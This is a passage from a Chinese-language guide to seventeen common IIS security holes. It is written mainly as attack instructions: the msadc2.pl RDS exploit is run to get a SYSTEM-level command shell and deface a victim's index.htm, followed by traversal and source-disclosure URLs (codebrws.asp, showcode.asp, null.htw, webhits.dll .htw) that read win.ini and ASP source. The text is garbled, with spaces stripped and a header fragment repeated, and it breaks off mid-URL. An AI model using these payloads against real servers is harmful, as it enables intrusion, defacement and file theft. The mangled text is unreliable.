IIS的十七個常見安全漏洞

第第頁IIS的十七個常見安全漏洞=runonlystep

Ora-Rwillresumea(v2)commandsession

[quack@chatquack]$perlmsadc2.pl-h/

--RDSsmackv2-rainforestpuppy/ADM/wiretrip--

Typethecommandlineyouwanttorun(cmd/cassumed):

cmd/c

如果出現(xiàn)cmd/c后，直接鍵入命令行，就可以以system權(quán)限執(zhí)行命令了。比如xundi教的：

echohackedbymed:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

察看文件源代碼

/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代碼

/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代碼

/null.htw?CiWebhitsfile=/default.asp%20%20CiRestriction=none%20%20CiHiliteType=full

6.webhits.dll.htw

hit-highligting功能是由IndexServer提供的允許一個WEB用戶在文檔上highlighted（突出）他們原始搜索的條目，這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件，Webhits.dll是一個ISAPI應用程序來處理請求，打開文件并返回結(jié)果，當用戶控制了CiWebhitsfile參數(shù)傳遞給.htw時，他們就可以請求任意文件，結(jié)果就是導致查看ASP源碼和其他腳本文件內(nèi)容。要了解你是否存在這個漏洞，你可以請求如下條目：

/nosuchfile.htw如果你從服務器端獲得如下信息：

formatoftheQUERY_STRINGisinvalid這就表示你存在這個漏洞.這個問題主要就是webhits.dll關(guān)聯(lián)了.htw文件的映射，所以你只要取消

這個映射就能避免這個漏洞，你可以在你認為有漏洞的系統(tǒng)中搜索.htw文件，一般會發(fā)現(xiàn)如下的程序：

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw(這個一般為loopback使用)

一個攻擊者可以使用如下的方法來訪問系統(tǒng)中文件的內(nèi)容：

/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.inicirestriction=nonecihilitetype=full

就會在有此漏洞系統(tǒng)中win.ini文件的內(nèi)容。7.ASPAlternateDataStreams(::$DATA)要查看一些.asp文件的內(nèi)容，你可以請求如下的URL：/defaul